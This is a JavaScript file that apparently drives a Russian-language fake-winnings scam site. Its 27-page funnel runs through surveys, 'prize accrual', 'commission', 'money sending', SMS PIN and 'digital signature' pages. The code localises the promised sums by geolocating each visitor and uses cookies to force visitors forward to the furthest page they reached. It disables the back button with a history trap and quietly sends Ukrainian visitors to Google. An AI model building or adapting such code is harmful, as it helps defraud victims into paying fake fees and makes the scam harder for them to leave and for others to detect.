var redirectLastPage = true;
var notUkraine = true

var pageRedirect = 'https://www.google.com/';


var cookee_page_id;
var pages = [
        {id: 1, page: "index.html"},
        {id: 2, page: "sinhron.html"},
        {id: 3, page: "opros1.html"},
        {id: 4, page: "opros2.html"},
        {id: 5, page: "opros3.html"},
        {id: 6, page: "onlain-server.html"},
        {id: 7, page: "easychat-1.html"},
        {id: 8, page: "easychat-2.html"},
        {id: 9, page: "easychat-3.html"},
        {id:10, page: "easychat-4.html"},
        {id:11, page: "easychat-5.html"},
        {id:12, page: "obrabotka-nacislenie.html"},
        {id:13, page: "nacislenie-viigrasha.html"},
        {id:14, page: "obmen-viigrisha.html"},
        {id:15, page: "komissiy.html"},
        {id:16, page: "komissiy2.html"},
        {id:17, page: "dannie.html"},
        {id:18, page: "otprawka-deneg.html"},
        {id:19, page: "bronirowanie.html"},
		{id:20, page: "aktiwaciy-kod.html"},
		{id:21, page: "sms.html"},
		{id:22, page: "sms-pin.html"},
		{id:23, page: "sms-aktivaciy.html"},
		{id:24, page: "sms-komisiy.html"},
		{id:25, page: "cifrovay-podpis.html"},
		{id:26, page: "cifrovay-podtwerjdenie.html"},
		{id:27, page: "final.html"}
    ];



var moneyCountryData = [{
    country: "Росиия",
    code: 'RUB',
    kurs: 1,
    dollar: 62.78,
    textMoney1: ["русские рубли", "рубли"],
    pre: ["руб", "рублей", "рубль", "рубля", "рубля", "рубля", "рублей", "рублей", "рублей", "рублей", "рублей"]
},{
    country: "Украина",
    code: 'UAH',
    kurs: 0.42,
    dollar: 26.78,
    textMoney1: ["украинские гривны", "гривны"],
    pre: ["грн", "гривен", "гривна", "гривны", "гривны", "гривны", "гривен", "гривен", "гривен", "гривен", "гривен"]
},{
    country: "Казахстан",
    code: 'KZT',
    kurs: 5.29,
    dollar: 346.82,
    textMoney1: ["казахские тенге", "тенге"],
    pre: ["тенге", "тенге", "тенге", "тенге", "тенге", "тенге", "тенге", "тенге", "тенге", "тенге", "тенге"]
},{
    country: "Белоруссия",
    code: 'BYN',
    kurs: 0.03217,
    dollar: 2.026,
    textMoney1: ["белорусские рубли", "рубли"],
    pre: ["руб", "рублей", "рубль", "рубля", "рубля", "рубля", "рублей", "рублей", "рублей", "рублей", "рублей"]
},{
    country: "Молдавия",
    code: 'MDL',
    kurs: 0.2695,
    dollar: 16.97,
    textMoney1: ["молдавские леи", "леи"],
    pre: ["лей", "леев", "лей", "лея", "лея", "лея", "леев", "леев", "леев", "леев", "леев"]
},{
    country: "Азербайджан",
    code: 'AZN',
    kurs: 0.0277,
    dollar: 1.744,
    textMoney1: ["азербайджанские манаты", "манаты"],
    pre: ["ман", "манатов", "манат", "маната", "маната", "маната", "манатов", "манатов", "манатов", "манатов", "манатов"]
},{
    country: "Армения",
    code: 'AMD',
    kurs: 7.671,
    dollar: 483,
    textMoney1: ["армянские драмы", "драмы"],
    pre: ["драм", "драмов", "драм", "драма", "драма", "драма", "драмов", "драмов", "драмов", "драмов", "драмов"]
},{
    country: "Киргизия",
    code: 'KGS',
    kurs: 1.084,
    dollar: 68.26,
    textMoney1: ["киргизские сомы", "сомы"],
    pre: ["сом", "сомов", "сом", "сома", "сома", "сома", "сомов", "сомов", "сомов", "сомов", "сомов"]
},{
    country: "Таджикистан",
    code: 'TJS',
    kurs: 0.1511,
    dollar: 9.514,
    textMoney1: ["таджикистанские сомони", "сомони"],
    pre: ["сом", "сомони", "сомони", "сомони", "сомони", "сомони", "сомони", "сомони", "сомони", "сомони", "сомони"]
},{
    country: "Туркмения",
    code: 'TMT',
    kurs: 0.0554,
    dollar: 3.489,
    textMoney1: ["туркменские манаты", "манаты"],
    pre: ["m", "манатов", "манат", "маната", "маната", "маната", "манатов", "манатов", "манатов", "манатов", "манатов"]
},{
    country: "Узбекистан",
    code: 'UZS',
    kurs: 124.6,
    dollar: 7849,
    textMoney1: ["узбекистанские сумы", "сумы"],
    pre: ["сўм", "сумов", "сум", "сума", "сума", "сума", "сумов", "сумов", "сумов", "сумов", "сумов"]
},{
    country: "Грузия",
    code: 'GEL',
    kurs: 0.040,
    dollar: 2.49,
    textMoney1: ["грузинские лари", "лари"],
    pre: ["лари", "лари", "лари", "лари", "лари", "лари", "лари", "лари", "лари", "лари", "лари"]
}];




function showlSog(id) {
    $('.lSog#' + id).addClass('show');
}
function hidelSog(id) {
    $('.lSog#' + id).removeClass('show');
}
function setCookie(name, value, days) {
    var date = new Date();
    date.setTime(date.getTime() + (days*24*60*60*1000));
    var expires = "; expires=" + date.toGMTString();
    document.cookie = name + "=" + value + expires;
}

function readCookie(name) {
    var n = name + "=";
    var cookie = document.cookie.split(';');
    for(var i=0;i < cookie.length;i++) {
        var c = cookie[i];
        while (c.charAt(0)==' '){c = c.substring(1,c.length);}
        if (c.indexOf(n) == 0){return c.substring(n.length,c.length);}
    }
    return null;
}



function redirectPage(page_idLocal) {
    var page = '';
	
	
	if (page_idLocal > pages.length) {
		page_idLocal = pages.length;
        setCookie('page_id', page_idLocal, 30);
	}
	else if (page_idLocal < 1) {
		page_idLocal = 1;
        setCookie('page_id', page_idLocal, 30);
	}
	
	
    for (var i = 0; i < pages.length; i++) {
        if (pages[i].id == page_idLocal) {
            page = pages[i].page;
            break;
        }
    }
	if (redirectLastPage) {
		window.location.href = page;
		document.location = page;
	}
    
    // location.reload();
}

function load() {
    cookee_page_id = readCookie('page_id');
    if(cookee_page_id == null) {
        setCookie('page_id', page_id, 30);
    }
    // console.log(cookee_page_id);
}

function init() {
    if(cookee_page_id != null) {
        if(+page_id < +cookee_page_id) {
            redirectPage(cookee_page_id);
  		}
  		if(+page_id > +cookee_page_id) {
  			setCookie('page_id', page_id, 30);
        }
    }
}



window.onload = function() {
    load(),
    init();
    
    if (localStorage["country"] != ymaps.geolocation.country) {
        
        localStorage["country"] = ymaps.geolocation.country;
        updateMoney();
    }
    
};

load();
init();


history.pushState(null, null, location.href);
window.onpopstate = function(event) {
    history.go(1);
};

function updateMoney() {
    $('.sMoney').each(
        function(i, elem){
            $(this).text(getMoney($(this).text()));
        }
    );
    $('.sMoney2').each(
        function(i, elem){
            $(this).text(getMoney($(this).text(), 1));
        }
    );
    
    
    if (localStorage["country"] == 'Украина' && notUkraine) {
        window.location.href = pageRedirect;
        document.location = pageRedirect;
    }
}
function getMoney(money, preVal = 0) {
    money = parseInt(money.replace(/[^0-9.,]/gim, ''));
    
    for(var i = 0 ; i < moneyCountryData.length ; i++) {
        if (localStorage["country"] == moneyCountryData[i].country) {
            var money = Math.floor(money * moneyCountryData[i].kurs).toString();
            if (preVal > 0)
                preVal = parseInt(money.substr(money.length - 1, 1)) + 1;
            return money.replace(/(\d)(?=(\d\d\d)+([^\d]|$))/g, '$1 ') + ' ' + moneyCountryData[i].pre[preVal];
        }
    }
    var money = Math.floor(money * moneyCountryData[0].kurs).toString();
    if (preVal > 0)
        preVal = parseInt(money.substr(money.length - 1, 1)) + 1;
    return money.replace(/(\d)(?=(\d\d\d)+([^\d]|$))/g, '$1 ') + ' ' + moneyCountryData[0].pre[preVal];
}
function writeMoney(money, preVal = 0) {
    return document.write(getMoney(money, preVal));
}


var waitTUpdateVal = 0;
function waitTUpdate() {
    if (waitTUpdateVal == 1)
        $('.pointsSC').text('..');
    else if (waitTUpdateVal == 2)
        $('.pointsSC').text('...');
    else {
        waitTUpdateVal = 0;
        $('.pointsSC').text('.');
    }
    waitTUpdateVal++;
    return setTimeout("waitTUpdate()", 700);
}
waitTUpdate();

function getCodeCountry() {
    for(var i = 0 ; i < moneyCountryData.length ; i++) {
        if (localStorage["country"] == moneyCountryData[i].country) {
            return moneyCountryData[i].code;
        }
    }
    return moneyCountryData[0].code;
}
function getTextCountryMoney1(textID) {
    for(var i = 0 ; i < moneyCountryData.length ; i++) {
        if (localStorage["country"] == moneyCountryData[i].country) {
            return moneyCountryData[i].textMoney1[textID];
        }
    }
    return moneyCountryData[0].textMoney1[textID];
}



var d = new Date();
var month1= new Array("янв,", "фев,", "мар,", "апр,", "мая,", "июн,", "июл,", "авг,", "сен,", "окт,", "ноя,", "дек,");
var nowDate = d.getDate()+ " " + month1[d.getMonth()]+ " " + d.getFullYear() + " г.";

var monthNames= new Array("январь", "февраль", "март", "апрель", "май", "июнь", "июль", "август", "сентябрь", "октябрь", "ноябрь", "декабрь");

var nowDateN1 = d.getDate();
var nowMonthN1 = monthNames[d.getMonth()];
var nowYearN1 = d.getFullYear() + " г.";